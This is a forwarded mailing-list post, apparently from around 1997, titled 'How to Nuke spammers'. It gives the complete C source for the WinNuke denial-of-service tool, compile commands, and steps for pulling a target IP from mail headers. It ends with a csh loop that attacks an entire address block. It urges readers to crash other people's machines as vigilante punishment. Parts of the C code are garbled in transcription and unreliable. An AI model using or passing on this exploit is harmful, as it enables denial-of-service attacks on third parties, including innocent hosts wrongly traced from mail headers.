Will pass on a particularly evil bit of code for those that despise
mass-marketing spammers....
This is not mine, I ran into it through the "reverse engineering" crowd.
Yes, it has been said that I have little patience. Find, Fix, Destroy.
------- Snip -------------
_How to Nuke spammers__
a nice fine c program (Winnuke) by _eci... listing at the end of this section
How to use WinNuke to get rid of spammers
winnuke.c is a program which will crash any Windows 95/NT machine. Since
this operating system is popular among spammers, winnuke makes it easy to
get rid of them.
First, take the program code from the bottom of this post (everything
after the ---Cut Here--- line) and save it to a text file called winnuke.c
on your shell account or Linux box.
Now compile it by typing:
gcc winnuke.c -o winnuke
If you have SunOS, you may need to use this command instead:
gcc winnuke.c -lsocket -lnsl -o winnuke
You should now have an executable program called winnuke in your directory.
Now find the spammer's IP number. This is the first IP number in the mail
headers which is not your mail server or mail relay. Once you have the
spammer's IP number (eg 192.168.12.109) type: ./winnuke 192.168.12.109
except use the spammer's real IP number that you found. You should see
something like the following:
% ./winnuke 192.168.12.109
Connected to [192.168.12.109:139].
Sending crash... Done!
%
Congratulations! You just nuked a spammer! Give yourself a pat on the
back. You can ping the IP address to verify that it is actually down.
If it doesn't work...
Unfortunately a few spammers don't have just one IP address but a whole
block (255 addresses) In this case you will need to nuke the entire block.
To do this, use this script:
#!/bin/csh
@ number = 255
loop:
@ number = $number - 1
./winnuke 205.199.212.$number &
#sleep 1
if ($number > 1) then
goto loop
endif
Except you should use the first three bytes of the spammer's IP number
instead of 205.199.212. If your net connection is too slow, uncomment the
sleep command (line 6) and that will slow it down so it can get all the
packets out. That's it...
---Cut Here---
/* winnuke.c - (05/07/97) By _eci */
/* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#define dport 139 /* Attack port: 139 is what we want */
int x, s;
char *str = "Bye"; /* Makes no diff */
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;
int open_sock(int sock, char *server, int port) {
struct sockaddr_in blah;
struct hostent *he;
bzero((char *)&blah,sizeof(blah));
blah.sin_family=AF_INET;
blah.sin_addr.s_addr=inet_addr(server);
blah.sin_port=htons(port);
if ((he = gethostbyname(server)) != NULL) {
bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
}
else {
if ((blah.sin_addr.s_addr = inet_addr(server)) <0) {
perror("gethostbyname()"); return(-3); } } if (connect(sock,(struct
sockaddr *)&blah,16)="=-1)" { perror("connect()"); close(sock);
return(-4);
} printf("Connected to [%s:%d].\n",server,port); return; } void main(int
argc, char *argv[]) { if (argc !="2)" { printf("Usage: %s
<target>\n",argv[0]);
exit(0);
}
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket()");
exit(-1);
}
open_sock(s,argv[1],dport);
printf("Sending crash... ");
send(s,str,strlen(str),MSG_OOB);
usleep(500000);
printf("Done!\n");
close(s);
}
jax(a)tvec.net